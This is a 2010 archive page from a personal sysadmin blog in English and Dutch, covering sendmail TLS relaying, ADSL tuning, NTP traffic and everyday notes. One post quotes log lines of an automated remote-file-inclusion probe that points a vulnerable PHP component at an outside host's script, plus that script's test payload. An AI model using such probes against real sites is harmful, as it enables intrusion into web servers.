News archive March 2010 - Koos van den Hout

Archive by year: 1999 | 2000 | 2001 | 2002 | 2003 | 2004 | 2005 | 2006 | 2007 | 2008 | 2009 | 2010 | 2011 | 2012 | 2013 | 2014 | 2015 | 2016 | 2017 | 2018 | 2019 | 2020

2010-03-31 (#) 10 years ago
Ok, sendmail locally on the laptop now works, but the next step is to get this to work from Thunderbird. I want Thunderbird to present the certificate to use the outgoing relay. To import a certificate into Thunderbird, I need to convert it to pkcs#12 format:
$ openssl pkcs12 -export -inkey thunderbird.pem -in machiavelli.idefix.net.crt -out thunderbird.p12 -name "Thunderbird op Machiavelli"
Enter pass phrase for thunderbird.pem:
Enter Export Password:
Verifying - Enter Export Password:
This gives me a .p12 file that Thunderbird understands so I can import it. But even when I set up Thunderbird to send the mail to the correct server on port 587 with TLS enabled it does not present its own certificate, resulting in a 'relaying denied' message (which is exactly what I want when the certificate is missing!). Time to search further. Maybe something in the certificate needs to match, but searching the Thunderbird help and on-line doesn't give hints.
As a backup I can let Thunderbird send to localhost:smtp and use the sendmail installation there to send it to the server (which it can) but then I can't see whether that worked when I close Thunderbird and disconnect the laptop. I'd rather have some visual conformation that mail is out the door.

Tags: , ,
2010-03-30 (#) 10 years ago
Mirjam recently bought a new laptop and installed Linux on it (sofar nothing special) but we thought it would be nice if mail from the laptop would work from anywhere in the world. Using the information from Relaying with TLS in Sendmail, ubuntu sendmail and a bit of my own thinking this was not very hard. By default ubuntu hides the entire sendmail certificate creation and signing process, and I needed 'better' certificates signed by my own certificate authority. For the client side:
root@machiavelli:/etc/mail/tls# openssl req -new -key sendmail-common.key -out sendmail-client.csr 
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [NL]:
State or Province Name (full name) [Utrecht]:
Locality Name (eg, city) [Utrecht]:
Organization Name (eg, company) [idefix.net]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:machiavelli.idefix.net
Email Address []:koos@machiavelli.idefix.net

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Next I signed this csr using the idefix.net CA, and put the resulting client certificate back in /etc/mail/tls/sendmail-client.crt. On the client, /etc/mail/submit.mc had to be changed to use tls and talk directly to the right machine:
FEATURE(`msp', `postbode.idefix.net', `MSA')
include(`/etc/mail/tls/starttls.m4')dnl
Now for the server side I also generated a csr for the name postbode.idefix.net and signed it. I changed /etc/mail/sendmail.mc to do this correctly:
include(`/etc/mail/tls/starttls.m4')dnl
dnl #
dnl # fix debian weird choice

define(`confTLS_SRV_OPTIONS', `')dnl
And updated the /etc/mail/access map to relay based on the data from the idefix.net certificate:
# SSL magic
CERTIssuer:/C=NL/ST=Utrecht/L=Utrecht/O=idefix.net/OU=Certificate+20Authority/CN=idefix.net+20CA/emailAddress=hostmaster@idefix.net     RELAY
Testing it was harder from home which is normally a trusted network.. it just lost that role for a few minutes. And I noticed that when I use mail -v it will ask the upstream mailhost to also be verbose. As noted in the linked article logging is sparse. One hint in the headers of the relayed mail is:
Received: from machiavelli.idefix.net (wireless-machiavelli.idefix.net [IPv6:2001:888:1011:1:21f:e1ff:fe45:2894])
        by kzdoos.xs4all.nl (8.14.2/8.14.2/Debian-2build1) with ESMTP id o2UKFH9
X002890
        (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK)
        for XXXXXXXXXXXXXXX; Tue, 30 Mar 2010 22:15:18 +0200

Tags: , ,
2010-03-28 (#) 10 years ago
Teken dat het echt slecht gaat met de accu van mijn Dell D630 laptop:
[   20.075680] ACPI: Battery Slot [BAT0] (battery absent)
[   20.075762] ACPI: Battery Slot [BAT1] (battery absent)
Volgens acpi (en volgens de dell setup) zit er helemaal geen accu in. En dat terwijl ik nog een screenshot wilde maken van de gnome battery applet die beweerde dat de accu aan vervanging toe was.

Tags: , ,
2010-03-28 (#) 10 years ago
En het is bij IDG uitgevers nogsteeds niet doorgekomen dat ik echt geen spam van ze wil. Na eerdere afmeldpogingen in oktober 2009 zie ik net weer vrolijk nieuwe spam van ze staan, die weer liegt dat ik een relatie met Computer!Totaal zou hebben. Die heb ik niet meer sinds januari 2005, dus langer dan de termijn van twee jaar waarop 'bestaande relatie' een wettelijk geaccepteerde reden is, en ik heb ook al vaker pogingen gedaan van IDG af te komen.
Tijd voor wat klachten naar de juiste adressen, onder andere www.spamklacht.nl en het advies naar de provider van de verzendende mailserver om een kniptang toe te passen om herhaling te voorkomen. En naar de redactie van computer!totaal, misschien willen die eens schrijven over de spam-ergernis die computer!totaal en IDG uitgevers veroorzaken.
Update 2010-03-29 In ieder geval reageert er een redacteur dat de afmelding doorgegeven wordt aan de juiste persoon.

Tags: , ,
2010-03-26 (#) 10 years ago
Brilliant remark by Matt Blaze when he announces his twitter url:
140 is the new 1536.
(For those who don't get it: it's a massive nerdjoke)

Tags: ,
2010-03-20 De verwachte snelheid van PLC netwerk van Devolo meten (DLAN) 10 years ago
Vandaag was er een bijeenkomst van de pcgg netwerkgroep en dit keer had ik vantevoren wat scripts gemaakt en getest om de theoretische throughput van het dlan netwerk (netwerk over stopcontact) te meten. We hebben er op de lokatie altijd problemen mee, maar toen we er mee begonnen was het stabieler(!) dan de wifi. Dus een keer meten hoe erg het was en hoe het zich in de loop van de dag ontwikkelde leek mij nuttig. Met wat perl kon de output van dlanlist gemasseerd worden om in een rrdtool database te passen en daar uit worden weer grafiekjes gebouwd op dagen dat de 'router' actief is.
  • DLAN throughput zaterdag 20 Maart. De verbetering van 'intern' aan het begin is omdat we de videoprojector in een ander stopcontact gestoken hebben. Dat 'extern' eerder wegvalt is omdat de netwerkkabel uit de dlan adapter gezakt was. Daar helpt niets tegen...
  • DLAN throughput donderdag 18 Maart. Ter vergelijking, de test van de scripts thuis.
Uiteindelijk blijft het dus moeilijk op deze lokatie.
Bij langer meten zonder veel dataverkeer blijven er trouwens continue dezelfde waarden uit dlanlist komen. Thuis heb ik dat opgelost door even iperf in te zetten. Op de bijeenkomsten komt dat verkeer vanzelf.

Tags: , ,
2010-03-19 (#) 10 years ago
A little oops at the Telegraph. Now fixed: Large Hadron Collider breaks energy record which is interesting science news.

Tags: ,
2010-03-19 (#) 10 years ago
Weer een onhandigheid in de blijkbaar vernieuwde Eneco website : Als je op 'mijn eneco' klikt komt er een login scherm overheen maar zodra je muis weer daar vanaf beweegt (in mijn geval omdat ik de juiste gegevens in de password store ging zoeken) is het login scherm gelijk weer weg. De workaround is om naar de oudere versie van de mijn eneco inlogpagina te gaan.
En gelijk ergernisje 2: ook als ik ingelogd ben in de mijn eneco omgeving moet ik op het formulier om bovenstaand te melden alsnog al mijn gegevens invullen. Dus nu heb ik 2 problemen met de website gemeld.

Tags: ,
2010-03-19 (#) 10 years ago
I walked in this morning at work with some people looking at me expectingly. About the third person was nice enough to explain: home directories and mail were unavailable. A quick look showed me that the home directory server was waiting for the ldap server and the ldap server showed a kernel panic on the console. Strangely enough the root ldap object was still available so the monitoring system did not notice it.
Anyway, server systems should not wait for the systems administrator after a panic in my opinion, they should be available. So I looked it up, and indeed: Linux Kernel panic reboot explains how simple it is to change this setting. So I changed all servers at work to give up after a panic and reboot. That should help availability. I'm not interested in the intimate details of a panic, I want working ldap. Yes, as several people noted to me, there are ways in which this can lead to a reboot-loop, for example when the panic is file-system related. I'll take that risk when it will 'fix' all other problems.

unix - linux - storage unixfoo is good at linux and netapp knowledge. I browsed it for a while and found lots of interesting stuff.


Tags: , ,
2010-03-18 (#) 10 years ago
Handy unix utility which I had a hard time remembering today: watch. For some reason this is part of procps /proc file system utilities. I used watch to keep an eye on the number of USB storage devices seen by a computer because I was busy hooking up 28 of them at a time to 4 USB hubs and sometimes things were flaky, resulting in the famous usb 7-3.3: device not accepting address 83, error -32. The solution was to unplug and replug the USB device. Trying another hub helped too.
$ watch 'lsusb -t 2>&1| grep -c 0x090c'
This showed the number of USB storage devices (of the type I used) detected so I could plug them in and see whether detection went right.

Tags: , ,
2010-03-17 (#) 10 years ago
Dankzij een motie die Arda Gerkens (SP) en Martijn van Dam (PvdA) willen gaan indienen gaat demissionair minister Maria van der Hoeven van Economische Zaken onderzoeken of de overheid bij aanbestedingen verplicht moet vragen naar IPv6.
Goed nieuws voor IPv6 acceptatie. Soms moet een overheid de aanmerkelijke macht inzetten om de markt even een sturing te geven in een richting die later nuttig is voor diezelfde markt.
Bron: Kamerleden @ArdaG en @martijnvdam zijn top. Besteden ook aandacht aan niet-sexy maar wel belangrijke zaken - Twitterbericht Erik Huizer.

Tags: , ,
2010-03-17 (#) 10 years ago
One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.

Tags: , ,
2010-03-14 (#) 10 years ago
Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like
The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance.
and
Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, its climate controlled and is capable of withstanding a nuclear hit.

The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.

It's also easy to reach:
it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessable by road too).
Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting

Tags: , ,
2010-03-11 (#) 10 years ago
Met alle aankomende wijzigingen op het werk hebben we besloten om de spamfiltering uit te besteden aan de surfnet mailfilter dienst. Die worden er voor betaald om de filtering dagelijks bij te houden en wij hebben er straks minder tijd voor. Totnogtoe was het natuurlijk altijd onze 'eigen' mailsetup en konden we zelf de spamstats bijhouden, en dat verliezen we.
We hebben eerst students.cs.uu.nl omgezet en vanmorgen cs.uu.nl. In de logs van de studentenmailserver viel me opeens op dat de smtpd ratelimiting (anvil) van postfix aansloeg op de surfnet mailfilters dus ik heb de surfnet mailfilter adressen toegevoegd aan de smtpd_client_event_limit_exceptions setting in postfix. Bij cs.uu.nl gebruiken we postfix, al van toen het nog vmailer heette. In sendmail zou ik voor die IP blokken andere ratelimits kunnen zetten maar postfix heeft blijkbaar alleen de opties default en geen ratelimits.

Tags: , ,
2010-03-09 (#) 10 years ago
I made a lolcat: How many times do I need to ask to put the seat down!

Tags: ,
2010-03-08 (#) 10 years ago
De adsl aansluiting is tijden stabiel op 7968/1024 ipv 8000/1024. Met alles rond de aankomende xs4all snelheidsverhoging wilde ik weten of dit de maximale snelheid was die uit de lijn wilde komen. Ik heb in de logs terug zitten graven en sinds de omschakeling van fast op interleaved is 7968 de standaard snelheid. Daarvoor was de downloadsnelheid een tijdje instabiel. Verder lijken de specs ok:
                                  Downstream        Upstream 
Margin       [dB]     :             10.5             20.0 
Attenuation  [dB]     :             19.0             11.5 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18792             7968 
  Upstream            :             2415             1024 
Als ik zo lees over adsl interleaving kan het toch wel kloppen dat de snelheid nu 7968 kilobit/seconde is en ga ik straks naar een hogere snelheid (ergens in de buurt van 16000 kilobit/seconde).
Update : Later bedacht ik me dat ik ooit de adsl config opermode had aangepast naar multimode om stabieler te zijn met adsl1. De grens van adsl1 zit ergens rond 8000 kilobit. Dus geprobeerd:
[adsl]=>config opermode = multi_adsl2plus
En nu zijn de specs:
                                  Downstream        Upstream 
Margin       [dB]     :              6.0             18.0 
Attenuation  [dB]     :             20.0             11.5 
OutputPower  [dBm]    :              2.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18879             8005 
  Upstream            :             2426             1029 
Ik ben benieuwd wat het oplevert als er straks 16000/1024 (nee, nogsteeds geen upstream verbetering..) ingesteld wordt. Mocht het tegenvallen dan heb ik de optie om het adsl modem wat nu op zolder staat een stuk dichter bij het aansluitpunt te plaatsen.

Tags: , ,
2010-03-08 (#) 10 years ago
Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:
Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec                Device I/O:       19
 Overhead CPU:    0.016 sec                Paging I/O:      143
 CPU model:         2-CPU 2.5GHz Xeon L5420 6M (2048M)
I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.

Tags: ,
2010-03-08 (#) 10 years ago
Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.

Tags: , ,
2010-03-08 (#) 10 years ago
Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.

Tags: ,
2010-03-07 (#) 10 years ago
Werk aan de ligfietsen dit weekend: bij Mirjam was er tijdens de afgelopen zomervakantie een spatbord afgelopen wat ik nog eens moest terugzetten na het repareren van de stukke popnagels (vervangen door m3 boutjes, inspiratie bij bevestiging spatborden vervangen - knurft.net). Bij mij was er iets ernstigers defect: de binnenkabel van de voorrem brak een paar dagen eerder. Ik heb die vervangen door een andere binnenkabel. Zondag zijn we een heel stuk gaan fietsen en toen ging ook de binnenkabel van de achterrem er aan. Op exact dezelfde manier: gebroken bij de schroef van de rem zelf. Ik had de kabels wat kort afgesteld om goed te kunnen remmen, maar daardoor maakte ik geen gebruik meer van de volle bocht van het draaiende deel van de schijfremklauwen. Dus maar even de fiets naar binnen en kijken of ik het kan repareren. Kabel vervangen, en toen ik de remklauw er af had liggen zag ik een stelschroefje op de remklauw 'L-PAD IN ⇒'. Daar eens aan gedraait maar dat zat nogal vast. Aan de andere kant een 'R-PAD in ⇒' en die wilde wel draaien. Daarmee blijk ik de fijnafstelling van de brakepads aan te kunnen passen. Dus ik heb de remklauw er weer opgeschroeft, de kabel beter afgesteld zodat de kans op breken minder is en vervolgens de brakepads aangedraaid. Nu onthouden dat ik ze eerst moet terugdraaien bij vervanging.

Tags: ,
2010-03-05 (#) 10 years ago
idefix.net Internetcafe in Indonesia Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.

Tags: , ,
2010-03-04 (#) 10 years ago
It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.

Tags: , , ,
2010-03-04 (#) 10 years ago
After a bit of searching I managed to get my Dell Latitude D630 laptop to use the audio buttons in fvwm.

Tags: , ,
2010-03-04 (#) 10 years ago
Writing about security on your website has this interesting effect in the logs:
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
The content of heheh.txt is predictable:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.

Tags: , ,
2010-03-04 (#) 10 years ago
Almere te koop op Marktplaats Na de uitslag van de gemeenteraadsverkiezingen 2010 trok iemand de conclusie dat het zo niets meer gaat worden met Almere. Gratis mee te nemen dus bij de rommelmarktspullen.
Lokale screengrab, marktplaats had niet genoeg gevoel voor humor om de advertentie te laten staan.

Tags: ,
2010-03-03 (#) 10 years ago
Yes, took the step. The homepage lives at http://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.

Tags: , ,
2010-03-02 (#) 10 years ago
A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:
Most servers use the ~ symbol to represent the personal directories of individuals.
If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line.
Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling, this change was to me reason for a bump in the minor version number of the homepage.

Tags: , ,
2010-03-02 (#) 10 years ago
In Duitsland is de Vorratsdatenspeicherung (bewaarplicht telecommunicatie gegevens) terdege teruggeroepen door het constitutioneel hof omdat de wetgeving in strijd is met de Duitse grondwet. In Duitsland is er wel een constitutioneel hof wat wetten kan toetsen en wat dat mag aan de hand van klachten van Duitse burgers.

Nu nog zoiets in Nederland... artikel 120 van de Nederlandse grondwet verbiedt een constitutioneel hof. Er ligt een wetsvoorstel van Femke Halsema van Groenlinks om de grondwet te wijzigen om dit deels mogelijk te maken. Maar dat moet nog een keer door de tweede en eerste kamer.

Links:

Tags: , ,
2010-03-02 (#) 10 years ago
Nedap stemcomputers zijn niet dood, ze ruiken alleen maar heel raar. Bij de gemeenteraadsverkiezingen morgen weer een oprisping: Toch elektronisch stemmen bij verkiezingen - nu.nl waarbij dus stemcomputers een 'schaduwverkiezing' draaien, men kan na het echte kiezen met het rode potlood ook nog stemmen via een stemcomputer die werkt met het bonnetjessysteem (stem wordt gelijk uitgedraaid op een bonnetje en in een stembus gedeponeerd). Het aantal 'echte' stemmen met potlood en het aantal stemmen op de stemcomputers hoeven dus niet overeen te komen, maar zou Nedap het aandurven dat een accountant de uitslagen van de computers en die van de computerbonnetjes natelt?

Tags: , ,
2010-03-01 (#) 10 years ago
First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.

Tags: , , ,


, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: morenews.cgi,v 1.46 2019/10/20 15:42:02 koos Exp $ in 0.050947 seconds.